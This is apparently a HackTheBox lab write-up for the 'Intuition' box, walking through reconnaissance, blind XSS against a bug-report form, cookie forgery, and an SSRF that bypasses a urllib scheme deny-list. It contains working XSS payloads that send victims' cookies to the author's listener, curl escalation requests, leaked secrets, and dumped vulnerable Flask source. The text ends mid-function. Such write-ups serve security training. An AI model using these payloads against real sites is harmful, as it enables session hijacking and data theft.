Intuition

2024-04-30

INTRODUCTION

I hope that Runner got you warmed up for HTB’s Season 5, Anomalies… because you’re going to need it - this one is tough! Intuition was released as the second box of the season, requiring a wide array of skills to complete. Intuition is very long: by my count, it has ten distinct steps to overcome (which classifies it as being on the harder end of “hard” difficulty). Interestingly though, Intuition requires very little in terms of “exploitation”; it’s mostly about finding and abusing simple misconfigurations/mistakes - which, I think, makes it a more realistic scenario than many HTB boxes.

Recon is fairly easy - nothing is really hidden. After discovering a few subdomains, foothold begins. The foothold on this box was a real treat, though, taking place over two distinct stages. First we get to play around with a little XSS, stealing one of the dev’s cookies and using it to log into their dashboard. From there, we find a way to leverage our new position as a “dev” to XSS an administrator’s cookie, which gets us into a more privileged version of the dashboard, where the hunt for the User flag can begin.

That more privileged dashboard, with a little bit of research, has an easy-to-use SSRF (some might just consider it an LFI) with which we can read arbitrary files. A little bit of poking around with the SSRF yields us access to an FTP server and from there (with a little key-management trick) our first actual shell on the box, yielding the first flag.

The pathway to the root flag was pretty rough, and not entirely linear either. Staying methodical with enumeration is a huge asset for this one. You’ll need to analyze some source code, do some hash cracking, perform some customized brute-forcing, locate and parse some pretty mega log files… and by then all you’ve accomplished is moving laterally to the second user 😂

Privilege escalation begins in earnest with that second user, who has some sudo privileges and access to a poorly-written tool. This was a very approachable test of reverse engineering skills. You’ll need to carefully analyze a binary to figure out exactly how to reach its vulnerable code. Once you figure that out, you’ll still need to work out how to use that code to deliver your final payload.

Overall, Intuition is a fantastic reminder about the human element behind web-based systems, and that even simple misconfigurations can have grave consequences.

RECON

nmap scans

Port scan

For this box, I’m running my typical enumeration strategy. I set up a directory for the box with an nmap subdirectory, then set $RADDR to the target machine’s IP and ran a simple but broad port scan:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`

sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 256 b3:a8:f7:5d:60:e8:66:16:ca:92:f6:76:ba:b8:33:c2 (ECDSA)

|_ 256 07:ef:11:a6:a0:7d:2b:4d:e8:68:79:1a:7b:a7:a9:cd (ED25519)

80/tcp open http nginx 1.18.0 (Ubuntu)

|_http-server-header: nginx/1.18.0 (Ubuntu)

|_http-title: Did not follow redirect to http://comprezzor.htb/

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 2 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
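The grep/sed/tr pipeline that builds $TCPPORTS for the script scan can also be written as a few lines of Python, which some people find easier to read back later. This is only a sketch: the function name open_tcp_ports is my own invention, and it assumes nmap's normal (-oN) output format as shown in the port scan.

```python
import re

def open_tcp_ports(nmap_output: str) -> str:
    """Return every 'NNN/tcp' port found at the start of a line, comma-separated."""
    # Same idea as: grep "^[0-9]\+/tcp" | sed ... | tr '\n' ','
    ports = re.findall(r"^(\d+)/tcp\b", nmap_output, flags=re.MULTILINE)
    return ",".join(ports)

# Sample taken from the port scan results in this writeup
sample = """PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
"""
print(open_tcp_ports(sample))  # 22,80
```

Like the shell version, this does not look at the STATE column, so it would also pick up filtered ports if nmap listed any.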

Vuln scan

I ran a vuln scan, but there were no results:

sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR

UDP scan

I also ran a UDP scan for the top 100 ports, but also no results:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

Webserver Strategy



Noting the redirect from the nmap scan, I added comprezzor.htb to /etc/hosts and did banner grabbing on that domain:

DOMAIN=comprezzor.htb

echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts

☝️ I use tee instead of the append operator >> so that I don’t accidentally blow away my /etc/hosts file with a typo of > when I meant to write >>.

whatweb $RADDR && curl -IL http://$RADDR

Next I performed vhost and subdomain enumeration:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"

ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v



There were no results while enumerating vhosts at the root level ([anything].htb). Now I’ll check for subdomains of the known domain, comprezzor.htb:

ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o "fuzzing/vhost-$DOMAIN.md" -of md -timeout 4 -ic -ac -v

There were a few results:

I’ll move on to directory enumeration of each of the subdomains we just found:

echo "$RADDR auth.$DOMAIN" | sudo tee -a /etc/hosts;

echo "$RADDR dashboard.$DOMAIN" | sudo tee -a /etc/hosts;

echo "$RADDR report.$DOMAIN" | sudo tee -a /etc/hosts;

WLIST="/usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt"

for SUBD in auth dashboard report; do

ffuf -w $WLIST:FUZZ -u http://$SUBD.$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-$SUBD -of json -e .php,.js,.html -timeout 4 -v;

done;

ffuf -w $WLIST:FUZZ -u http://$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-root -of json -e .php,.js,.html -timeout 4 -v;



There were a few pages at auth.comprezzor.htb:



At dashboard.comprezzor.htb there is some backup directory:



I’m a little skeptical that dashboard only has one page / directory. I decided to recheck this, digging a lot deeper this time:

WLIST=/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt;

ffuf -w $WLIST:FUZZ -u http://dashboard.$DOMAIN/FUZZ -t 80 -c -ic -timeout 4 -v;

Ok, so I found one extra page: /resolve. This suggests that maybe the bug reports are resolved through that page? i.e. dashboard is for developers and administrators to use?

Exploring the Website





The index page at http://comprezzor.htb shows a tool to compress files. There is some frontend validation to only allow txt, pdf, and docx.



I tried submitting a txt file. Indeed, the site returned a download for my compressed file. I examined the compressed file using binwalk:

I should come back here later and investigate insecure file upload vulnerabilities 🚩



Checking out the subdomain auth.comprezzor.htb, I tried registering an account and logging in. My creds were jimbob : password1:



Logging in from here redirects us to report.comprezzor.htb. The page hints that there is some kind of prize for bug submissions. There are links to report.comprezzor.htb/about_reports and report.comprezzor.htb/report_bug:





After logging in, I have a single cookie: user_data. Decoding it as base64 shows something interesting:

🤔 The part after the pipe | character looks like a SHA256 sum… Perhaps it’s a hash of the json data? And if so, there’s a chance that this data is only stored client-side and is a trusted, controllable input. Perhaps I can assign myself a different role and provide a hash that matches it? I’ll have to come back and investigate this later 🚩

Edit: I now have confirmation of this mechanism.

Somebody reset the box: when I refreshed the page, I was still logged in and could continue navigating around the site with my old credential. That means that the user_data cookie is only validated by the hash, which is also stored client-side!

The /about_reports page shows some very juicy hints:

At Comprezzor, we take bug reports seriously. Our dedicated team of developers diligently examines each bug report and strives to provide timely solutions to enhance your experience with our services.

How Bug Reports Are Handled:

- Every reported bug is carefully reviewed by our skilled developers.

- If a bug requires further attention, it will be escalated to our administrators for resolution.

…

😀 Alright! If developers will be diligently examining my bug reports, maybe I can grab their cookie using some XSS?

FOOTHOLD

XSS - Bug Report



First, we need to investigate this suspected XSS. If it does exist, it will be delivered when the web dev or administrator opens the bug report - that means that this will be a blind XSS. I’ll set up a listener for incoming requests:

For this, I’m using one of my own tools: simple-http-server. It’s just an extension of the known and loved python http.server, but with a few additions:

- It also handles POSTs and file uploads nicely.

- In verbose mode it will show the full request headers.

- It will base-64 decode any data sent to it as the b64 parameter.

Feel free to try it out, if you want! There are many better tools out there already, but this one is mine ❤️
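If you don't want to install anything, the core idea of such a listener fits in a short script. To be clear, this is not the source of simple-http-server; it is a minimal sketch built on the standard library, and the names decode_b64_param, LoggingHandler and serve are made up for illustration. It only handles GET requests.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse

def decode_b64_param(path: str) -> Optional[str]:
    """Return the decoded value of the 'b64' query parameter, or None if absent."""
    values = parse_qs(urlparse(path).query).get("b64")
    if not values:
        return None
    raw = values[0].replace(" ", "+")   # parse_qs turns '+' into a space; undo that
    raw += "=" * (-len(raw) % 4)        # restore padding if it was stripped
    return base64.b64decode(raw).decode("utf-8", errors="replace")

class LoggingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Show the request line and all headers, then any decoded payload
        print(self.requestline)
        print(self.headers)
        decoded = decode_b64_param(self.path)
        if decoded is not None:
            print("b64 =>", decoded)
        self.send_response(200)
        self.end_headers()

def serve(port: int = 8000) -> None:
    """Listen on all interfaces until interrupted."""
    HTTPServer(("0.0.0.0", port), LoggingHandler).serve_forever()
```

Calling serve(8000) starts the listener; anything that arrives as ?b64=... gets printed in decoded form.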

sudo ufw allow from $RADDR to any port 8000 proto tcp

simple-server 8000 -v

Now that the listener is running, I’ll try an XSS payload inside each of the fields of the form, labelling which is which within the request:

Bug found - urgent attention required! <script src='http://10.10.14.9:8000?field=title'></script>

You are vulnerable to the xz backdoor. Patch immediately! <script src='http://10.10.14.9:8000?field=description'></script>



I clicked the Submit Bug Report button. After about 30s I saw a request come in:

Fantastic! Both fields are vulnerable to XSS. Plus, it looks like there’s some kind of automated “person” running on the server to read all my XSS payloads (The user-agent is the geckodriver).



Now that I know both fields are vulnerable, let’s try to get that cookie. I’ll try a few payloads all together:



Moments later, the requests came in to my listener:

Nice - we got a web dev’s cookie. Plus, we know the payload that worked was this:

<script>document.location='http://10.10.14.9:8000/documentlocation?b64='+document.cookie.slice(10,)</script>

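😅 i.e. the really simple payload… Keep it simple, stupid! The slice(10,) just drops the leading user_data= (10 characters), so that only the cookie value is sent.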

The cookie we received was the GET parameter:

eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4, which decodes to the following:

{"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8

I’ll try overwriting my cookie with theirs, and checking out the dashboard.comprezzor.htb subdomain.
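The decoding step is easy to script, which is handy once more cookies start arriving. Below is a small sketch; split_user_data is a name I made up, and the sample cookie is rebuilt from the decoded text shown in this writeup rather than pasted in. The last line tests the earlier guess that the digest might be a plain SHA-256 of the JSON part; I'm not assuming a result for that here.

```python
import base64
import hashlib
import json

def split_user_data(cookie_value: str):
    """Decode a user_data cookie into (claims dict, hex digest string)."""
    padded = cookie_value + "=" * (-len(cookie_value) % 4)
    decoded = base64.b64decode(padded).decode("utf-8")
    payload, _, digest = decoded.rpartition("|")
    return json.loads(payload), digest

# Rebuild the webdev cookie from its decoded form
plain = ('{"user_id": 2, "username": "adam", "role": "webdev"}'
         '|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8')
cookie = base64.b64encode(plain.encode()).decode()

claims, digest = split_user_data(cookie)
print(claims["username"], claims["role"], len(digest))  # adam webdev 64

# Is the digest simply sha256(json)? Prints True or False; a secret may be involved.
print(hashlib.sha256(plain.split("|")[0].encode()).hexdigest() == digest)
```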



Hmm… given the title, I get the feeling this isn’t the “admin” dashboard. However, we already got a hint about that: according to the text on report.comprezzor.htb/about_reports, we know that we can get an admin to look at the bug report if we escalate it:

…If a bug requires further attention, it will be escalated to our administrators for resolution…







Aha! I see how we might do that. Checking out report 5 reveals that, as a “web dev” we can change the priority of a report:

I’ll just need to submit a bug report, check its report_id, then POST /change_priority?report_id=[X]&priority_level=1. The other reports have IDs 1 through 5, so I think I’m safe to assume mine will be 6 (the box keeps resetting 👀 )

watch -c -n 5 \
"curl -X POST \
-b 'user_data=eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4' \
'http://dashboard.comprezzor.htb/change_priority?report_id=6&priority_level=1'"

With a little luck, that should escalate the report I submit within 5 seconds, and an admin will have to view it. Hopefully then, I’ll have an admin user’s cookie.
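The same escalation request can be built from Python, which makes it easier to plug in a different report_id. This is a sketch using only the standard library; build_escalation_request is a hypothetical helper, and the cookie string is a placeholder. Nothing is sent until the request is passed to urllib.request.urlopen.

```python
import urllib.request
from urllib.parse import urlencode

def build_escalation_request(report_id: int, cookie: str,
                             priority_level: int = 1) -> urllib.request.Request:
    """Build (but do not send) the POST that changes a report's priority."""
    query = urlencode({"report_id": report_id, "priority_level": priority_level})
    url = f"http://dashboard.comprezzor.htb/change_priority?{query}"
    return urllib.request.Request(
        url, method="POST", headers={"Cookie": f"user_data={cookie}"}
    )

req = build_escalation_request(6, "WEBDEV_COOKIE")  # placeholder cookie value
print(req.get_method(), req.full_url)
# POST http://dashboard.comprezzor.htb/change_priority?report_id=6&priority_level=1
```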





XSS - Admin User

… and that seemed like a fine plan, until I saw someone else’s XSS attempt arrive 😅

Clearly, the report_id will not have the assumed value of 6. That’s fine, I’ll just open two browser windows; I’ll submit the report (containing XSS) in one, and escalate it in the other. I’ll submit the successful payload from earlier:

Checking the dashboard again, we see the report arrive:

Now we can escalate using a cURL request:

curl -X POST -b 'user_data=eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4' 'http://dashboard.comprezzor.htb/change_priority?report_id=26&priority_level=1'

The escalation seems to be successful.

I never received a request to my XSS listener… 😓 I’m going to reset the box again.

YEP! That’s all it took 💢

👏 Within a minute or so, I received the admin cookie at my XSS listener:

For copy-pasting, that admin cookie is: eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5

{"user_id": 1, "username": "admin", "role": "admin"}|34822333d444ae0e4022f6cc679ac9d26d1d1d682c59c61cfbea29d776d589d9



I’ll swap out my cookie in the same way as before, directly in my browser, then navigate to dashboard.comprezzor.htb and see if anything is different.



😁 Nice! We’re into the admin dashboard now.

Admin Dashboard

Taking a look around the dashboard, there are a couple of new options here:

- Create a backup: uses the endpoint discovered earlier during directory enumeration: dashboard.comprezzor.htb/backup

- Create PDF Report: uses an endpoint not previously seen: dashboard.comprezzor.htb/create_pdf_report

Create a backup

At first glance, Create a backup doesn’t seem to do much.

I proxied the request through ZAP and found it was setting a session cookie. However, decoding the cookie at https://jwt.io reveals that it was only for the toast that appeared:

Create PDF Report



I’ll try using this feature in the way that, seemingly, it was intended:

But this simply yields an error message: “Invalid URL”.

To investigate this, I tried providing the URL of my local webserver (the former XSS listener): http://10.10.14.9:8000. When submitting that, I get a different error message: “Unexpected error!”. That’s odd, because the request came through to the listener and was given an HTTP 200 status…

However, from this request back to my HTTP server, I can see from the User-Agent that the target is running Python 3.11, probably a Flask server, and using urllib.



I’m starting to wonder why I can’t even get this thing to work when I provide a seemingly valid URL… To verify if the validation is occurring client-side or server-side, I’ll simply remove the type attribute from the <input> element, and thereby its automatic validation.

However, when I try to generate the report for http://dashboard.comprezzor.htb/report/4 again, still the same result: “Invalid URL”. That confirms that the validation is happening server-side, but I don’t yet know the details of it.

We already know from the User-Agent that the target is using urllib. So, to learn more, I checked the official documentation of urllib.parse. From this, I learned two main things:

- There are lots of URL schemes that I could try, not just http. It can use schemes including file, svn, ftp and even more exotic ones like gopher.

- The netloc of the URL is introduced by the // characters, which are considered safe characters and probably don’t need to be bypassed.

To try to find examples of urllib.parse in action, I did a DuckDuckGo search for “python 3.11 urllib parse”. Much to my surprise, near the bottom of the first page of results there was a CVE listed - and it’s a recent one! 🤑

Investigating a little further, I found this helpful article describing the vulnerability.

Apparently, there is a bug in some versions of urllib that allows URL scheme validation to be bypassed. A developer who didn’t know about this might use urllib.parse to read a URL and then check its scheme attribute against a deny-list (a much better option would have been to use a “contains”-style regex). These vulnerable versions of urllib will happily accept whitespace at the beginning of the URL, so the parsed scheme no longer matches anything on the deny-list, rendering that protection ineffective!
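To make the idea concrete, here is a rough sketch of the kind of check that is vulnerable, next to one that normalises its input first. The function names and the BLOCKED_SCHEMES set are my own, written before seeing any of the target's code. The result of the naive check for the space-prefixed URL depends on the interpreter: on an affected Python it should come back False (not blocked), while newer releases strip leading whitespace in the parser itself, so it may well print True there.

```python
from urllib.parse import urlparse

BLOCKED_SCHEMES = {"file", "ftp", "ftps"}  # assumed deny-list, for illustration

def naive_is_blocked(url: str) -> bool:
    """Deny-list check on the parsed scheme, with no normalisation."""
    return urlparse(url).scheme in BLOCKED_SCHEMES

def stricter_is_blocked(url: str) -> bool:
    """Same check, but surrounding whitespace is stripped before parsing."""
    return urlparse(url.strip()).scheme in BLOCKED_SCHEMES

for candidate in ("file:///etc/passwd", " file:///etc/passwd"):
    # The second line of output is the interesting one; it varies by Python version
    print(repr(candidate), naive_is_blocked(candidate), stricter_is_blocked(candidate))
```

An allow-list of expected schemes would be sturdier still than either of these, since anything unexpected is rejected by default.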

Let’s try it out (I’ve highlighted the space character to show that it’s there):

And… it works like a charm! The server offered a download of the “report” PDF:

PDF Report SSRF



The good news is that we can leak files. The bad news is that we’re clearly in a container (known because only the root user is shown in /etc/passwd)

I can also leak /etc/shadow, but there are no password hashes inside - further evidence that we are in a container.

Since it’s a container, maybe there are some useful environment variables set? I’ll check /proc/self/environ:

HOSTNAME=web.local
PYTHON_PIP_VERSION=22.3.1
HOME=/root
GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/d5cb0afaf23b8520f1bbcfed521017b4a95f5c01/public/get-pip.py
PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LANG=C.UTF-8
PYTHON_VERSION=3.11.2
PYTHON_SETUPTOOLS_VERSION=65.5.1
PWD=/app
PYTHON_GET_PIP_SHA256=394be00f13fa1b9aaa47e911bdb59a09c3b2986472130f30aa0bfaf7f3980637

From this we can confirm a couple of important details:

- Target is running Python 3.11.2

- The server is running in /app, with hostname web.local
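A side note on reading this file: in /proc/[pid]/environ the entries are separated by NUL bytes, which a PDF rendering can't show. If you ever have the raw bytes instead of a rendered PDF, splitting them is trivial. The sketch below uses a hand-built sample with a few of the values from above; parse_environ is a made-up helper name.

```python
def parse_environ(raw: bytes) -> dict:
    """Split NUL-separated KEY=VALUE records, as found in /proc/<pid>/environ."""
    env = {}
    for record in raw.split(b"\x00"):
        if not record:
            continue  # skip the empty piece after the trailing NUL
        key, _, value = record.decode("utf-8", errors="replace").partition("=")
        env[key] = value
    return env

# Hand-built sample using values from the leaked environment
sample = b"HOSTNAME=web.local\x00HOME=/root\x00PYTHON_VERSION=3.11.2\x00PWD=/app\x00"
env = parse_environ(sample)
print(env["PYTHON_VERSION"], env["PWD"])  # 3.11.2 /app
```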

Let’s keep enumerating the process. We can check /proc/self/cmdline to see how the web app was executed:

In other words, we now know the web app was run from /app, using something that looked like this:

python3 /app/code/app.py



Great, now we have an exact filepath for the web app. Let’s take a look-see: file:///app/code/app.py

This gets us some really important details:

- app.secret_key is 7ASS7ADA8RF3FD7

- Confirmation that the web app is using Flask

- Relative paths to the code for each subdomain:

  - ./blueprints/index/index.py is comprezzor.htb

  - ./blueprints/report/report.py is report.comprezzor.htb

  - ./blueprints/auth/auth.py is auth.comprezzor.htb

  - ./blueprints/dashboard/dashboard.py is dashboard.comprezzor.htb

USER FLAG

Reading the source code

To read the web app’s source code in its entirety, I should be able to get the files for each subdomain:

- /app/code/app.py

- /app/code/blueprints/index/index.py

- /app/code/blueprints/report/report.py

- /app/code/blueprints/auth/auth.py

- /app/code/blueprints/dashboard/dashboard.py

😅 And I get the super fun task of formatting all this python code… yay!

Here’s app.py:

from flask import Flask, request, redirect
from blueprints.index.index import main_bp
from blueprints.report.report import report_bp
from blueprints.auth.auth import auth_bp
from blueprints.dashboard.dashboard import dashboard_bp

app = Flask(__name__)
app.secret_key = "7ASS7ADA8RF3FD7"
app.config['SERVER_NAME'] = 'comprezzor.htb'
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024  # Limit file size to 5MB
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'docx'}  # Add more allowed file extensions if needed

app.register_blueprint(main_bp)
app.register_blueprint(report_bp, subdomain='report')
app.register_blueprint(auth_bp, subdomain='auth')
app.register_blueprint(dashboard_bp, subdomain='dashboard')

if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0", port=80)

This is index.py, or at least pretty similar to it:

import os
from flask import Flask, Blueprint, request, render_template, redirect, url_for, flash, send_file
from werkzeug.utils import secure_filename
import lzma

app = Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024  # Limit file size to 5MB
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'docx'}  # Add more allowed file extensions if needed

main_bp = Blueprint('main_bp', __name__, template_folder='./templates/')

def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@main_bp.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        if 'file' not in request.files:
            flash('No file part', 'error')
            return redirect(request.url)
        file = request.files['file']
        if file.filename == '':
            flash('No selected file', 'error')
            return redirect(request.url)
        if not allowed_file(file.filename):
            flash('Invalid file extension. Allowed extensions: txt, pdf, docx', 'error')
            return redirect(request.url)
        if file and allowed_file(file.filename):
            filename = secure_filename(file.filename)
            uploaded_file = os.path.join(app.root_path, UPLOAD_FOLDER, filename)
            file.save(uploaded_file)
            print(uploaded_file)
            flash('File successfully compressed!', 'success')
            with open(uploaded_file, 'rb') as f_in:
                with lzma.open(os.path.join(app.root_path, UPLOAD_FOLDER, f"{filename}.xz"), 'wb') as f_out:
                    f_out.write(f_in.read())
            compressed_filename = f"{filename}.xz"
            file_to_send = os.path.join(app.root_path, UPLOAD_FOLDER, compressed_filename)
            response = send_file(file_to_send, as_attachment=True, download_name=f"{filename}.xz", mimetype="application/x-xz")
            os.remove(uploaded_file)
            os.remove(file_to_send)
            return response
        return redirect(url_for('main_bp.index'))
    return render_template('index/index.html')

report.py:

from flask import Blueprint, render_template, request, flash, url_for, redirect
from .report_utils import *
from blueprints.auth.auth_utils import deserialize_user_data
from blueprints.auth.auth_utils import admin_required, login_required

report_bp = Blueprint("report", __name__, subdomain="report")

@report_bp.route("/", methods=["GET"])
def report_index():
    return render_template("report/index.html")

@report_bp.route("/report_bug", methods=["GET", "POST"])
@login_required
def report_bug():
    if request.method == "POST":
        user_data = request.cookies.get("user_data")
        user_info = deserialize_user_data(user_data)
        name = user_info["username"]
        report_title = request.form["report_title"]
        description = request.form["description"]
        if add_report(name, report_title, description):
            flash(
                "Bug report submitted successfully! Our team will be checking on this shortly.",
                "success",
            )
        else:
            flash("Error occured while trying to add the report!", "error")
        return redirect(url_for("report.report_bug"))
    return render_template("report/report_bug_form.html")

@report_bp.route("/list_reports")
@login_required
@admin_required
def list_reports():
    reports = get_all_reports()
    return render_template("report/report_list.html", reports=reports)

@report_bp.route("/report/")
@login_required
@admin_required
def report_details(report_id):
    report = get_report_by_id(report_id)
    print(report)
    if report:
        return render_template("report/report_details.html", report=report)
    else:
        flash("Report not found!", "error")
        return redirect(url_for("report.report_index"))

@report_bp.route("/about_reports", methods=["GET"])
def about_reports():
    return render_template("report/about_reports.html")

auth.py:

from flask import Flask, Blueprint, request, render_template, redirect, url_for, flash, make_response
from .auth_utils import *
from werkzeug.security import check_password_hash

app = Flask(__name__)
auth_bp = Blueprint('auth', __name__, subdomain='auth')

@auth_bp.route('/')
def index():
    return redirect(url_for('auth.login'))

@auth_bp.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        user = fetch_user_info(username)
        if (user is None) or not check_password_hash(user[2], password):
            flash('Invalid username or password', 'error')
            return redirect(url_for('auth.login'))
        serialized_user_data = serialize_user_data(user[0], user[1], user[3])
        flash('Logged in successfully!', 'success')
        response = make_response(redirect(get_redirect_url(user[3])))
        response.set_cookie('user_data', serialized_user_data, domain='.comprezzor.htb')
        return response
    return render_template('auth/login.html')

@auth_bp.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        user = fetch_user_info(username)
        if user is not None:
            flash('User already exists', 'error')
            return redirect(url_for('auth.register'))
        if create_user(username, password):
            flash('Registration successful! You can now log in.', 'success')
            return redirect(url_for('auth.login'))
        else:
            flash('Unexpected error occured while trying to register!', 'error')
    return render_template('auth/register.html')

@auth_bp.route('/logout')
def logout():
    pass

and finally, dashboard.py:

from flask import Blueprint, request, render_template, flash, redirect, url_for, send_file
from blueprints.auth.auth_utils import admin_required, login_required, deserialize_user_data
from blueprints.report.report_utils import get_report_by_priority, get_report_by_id, delete_report, get_all_reports, change_report_priority, resolve_report
import random, os, pdfkit, socket, shutil
import urllib.request
from urllib.parse import urlparse
import zipfile
from ftplib import FTP
from datetime import datetime

dashboard_bp = Blueprint('dashboard', __name__, subdomain='dashboard')
pdf_report_path = os.path.join(os.path.dirname(__file__), 'pdf_reports')
allowed_hostnames = ['report.comprezzor.htb']

@dashboard_bp.route('/', methods=['GET'])
@admin_required
def dashboard():
    user_data = request.cookies.get('user_data')
    user_info = deserialize_user_data(user_data)
    if user_info['role'] == 'admin':
        reports = get_report_by_priority(1)
    elif user_info['role'] == 'webdev':
        reports = get_all_reports()
    return render_template('dashboard/dashboard.html', reports=reports, user_info=user_info)

@dashboard_bp.route('/report/', methods=['GET'])
@login_required
def get_report(report_id):
    user_data = request.cookies.get('user_data')
    user_info = deserialize_user_data(user_data)
    if user_info['role'] in ['admin', 'webdev']:
        report = get_report_by_id(report_id)
        return render_template('dashboard/report.html', report=report, user_info=user_info)
    else:
        pass

@dashboard_bp.route('/delete/', methods=['GET'])
@login_required
def del_report(report_id):
    user_data = request.cookies.get('user_data')
    user_info = deserialize_user_data(user_data)
    if user_info['role'] in ['admin', 'webdev']:
        report = delete_report(report_id)
        return redirect(url_for('dashboard.dashboard'))
    else:
        pass

@dashboard_bp.route('/resolve', methods=['POST'])
@login_required
def resolve():
    report_id = int(request.args.get('report_id'))
    if resolve_report(report_id):
        flash('Report resolved successfully!', 'success')
    else:
        flash('Error occurred while trying to resolve!', 'error')
    return redirect(url_for('dashboard.dashboard'))

@dashboard_bp.route('/change_priority', methods=['POST'])
@admin_required
def change_priority():
    user_data = request.cookies.get('user_data')
    user_info = deserialize_user_data(user_data)
    if user_info['role'] != ('webdev' or 'admin'):
        flash('Not enough permissions. Only admins and webdevs can change report priority.', 'error')
        return redirect(url_for('dashboard.dashboard'))
    report_id = int(request.args.get('report_id'))
    priority_level = int(request.args.get('priority_level'))
    if change_report_priority(report_id, priority_level):
        flash('Report priority level changed!', 'success')
    else:
        flash('Error occurred while trying to change the priority!', 'error')
    return redirect(url_for('dashboard.dashboard'))

@dashboard_bp.route('/create_pdf_report', methods=['GET', 'POST'])
@admin_required
def create_pdf_report():
    global pdf_report_path
    if request.method == 'POST':
        report_url = request.form.get('report_url')
        try:
            scheme = urlparse(report_url).scheme
            hostname = urlparse(report_url).netloc
            try:
                dissallowed_schemas = ["file", "ftp", "ftps"]
                if (scheme not in dissallowed_schemas) and ((socket.gethostbyname(hostname.split(":")[0]) != '127.0.0.1') or (hostname in allowed_hostnames)):
                    print(scheme)
                    urllib_request = urllib.request.Request(report_url, headers={'Cookie': 'user_data=eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhM'
                    # SOME CODE WAS LOST HERE BECAUSE THE LINE WAS TOO LONG AND OVERFLOWED THE PDF-WRITER
                    # try: ?
                    response = urllib.request.urlopen(urllib_request)
                    html_content = response.read().decode('utf-8')
                    pdf_filename = f'{pdf_report_path}/report_{str(random.randint(10000,90000))}.pdf'
                    pdfkit.from_string(html_content, pdf_filename)
                    return send_file(pdf_filename, as_attachment=True)
            except:
                flash('Unexpected error!', 'error')
                return render_template('dashboard/create_pdf_report.html')
            else:
                flash('Invalid URL', 'error')
                return render_template('dashboard/create_pdf_report.html')
        except Exception as e:
            raise e
    else:
